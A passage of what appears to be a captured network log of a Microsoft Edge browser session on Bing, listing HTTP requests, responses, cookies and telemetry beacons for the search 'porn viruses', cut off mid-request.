Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl

Response

HTTP/1.1 200 OK

Content-Length: 845
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163d17acc404a995ac6aaafda0160
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-fmDeSe26fOJDf0akrI3xHi3LU0X6aidIIqKcBPIHA38='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:37 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.b6777b5c.1728144337.3bfeac7
GET

https://www.bing.com/th?id=OSK.32czPnkmQbsB6BPhajLIFbee3m0hZkbPs4cjaXASMYo&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.32czPnkmQbsB6BPhajLIFbee3m0hZkbPs4cjaXASMYo&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2212%22}]

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2212%22}] HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHHPGUSR=SRCHLANG=en&HV=1728144330&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bc777b5c.1728144332.1d6f726b
POST

https://www.bing.com/rewardsapp/reportActivity?IG=0DD30F05AB304142B388EAD39E0E9879&IID=SERP.5060&q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /rewardsapp/reportActivity?IG=0DD30F05AB304142B388EAD39E0E9879&IID=SERP.5060&q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 157
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0

Response

HTTP/1.1 200 OK

Content-Length: 1036
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Content-Encoding: gzip
Expires: -1
Pragma: no-cache
Vary: Accept-Encoding
X-EventID: 670163cc85bb4741947426cec207a9ea
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-zTprNXZyWiZBsX2gs1KKPXNBxbCk3n9dcwljmM1lWL8='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-Ceto-ref: 670163cc85bb4741947426cec207a9ea|AFD:670163cc85bb4741947426cec207a9ea|2024-10-05T16:05:32.820Z
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Set-Cookie: _C_ETH=1; domain=.bing.com; path=/; secure; httponly
Set-Cookie: _C_Auth=
Set-Cookie: SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:32 GMT; path=/; secure; SameSite=None
Set-Cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; domain=.bing.com; expires=Sun, 05-Oct-2025 16:05:32 GMT; path=/; secure; SameSite=None
Set-Cookie: _Rwho=u=d&ts=2024-10-05; domain=.bing.com; path=/; secure; HttpOnly; SameSite=None
Set-Cookie: _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; domain=.bing.com; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bc777b5c.1728144332.1d6fa340
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144331917%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22609%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144331917%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144331917%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1728144331917%2C%22Name%22%3A5795%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1728144331983%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22correlationId%22%3A%22670163c530fd47b881461133ee19e33f%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1728144332000%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%22670163c530fd47b881461133ee19e33f%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1728144332000%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2219041%22%5D%2C%22isWin11OrHigher%22%3A%22false%22%2C%22fullOsBuild%22%3A%2210.0.19041%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332037%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144332049%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144331917%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22609%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144331917%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144331917%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1728144331917%2C%22Name%22%3A5795%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1728144331983%2C%22Name%22%3A%22OrgId%22%2C%22FID%22%3A%22NoSignInAttempt%22%7D%2C%7B%22correlationId%22%3A%22670163c530fd47b881461133ee19e33f%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1728144332000%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%22670163c530fd47b881461133ee19e33f%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1728144332000%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2219041%22%5D%2C%22isWin11OrHigher%22%3A%22false%22%2C%22fullOsBuild%22%3A%2210.0.19041%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332037%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144332049%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bc777b5c.1728144333.1d6fa4c3
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1728144332207%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%228211.5%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1728144332209%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%228479.5%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1728144332209%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144332063%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%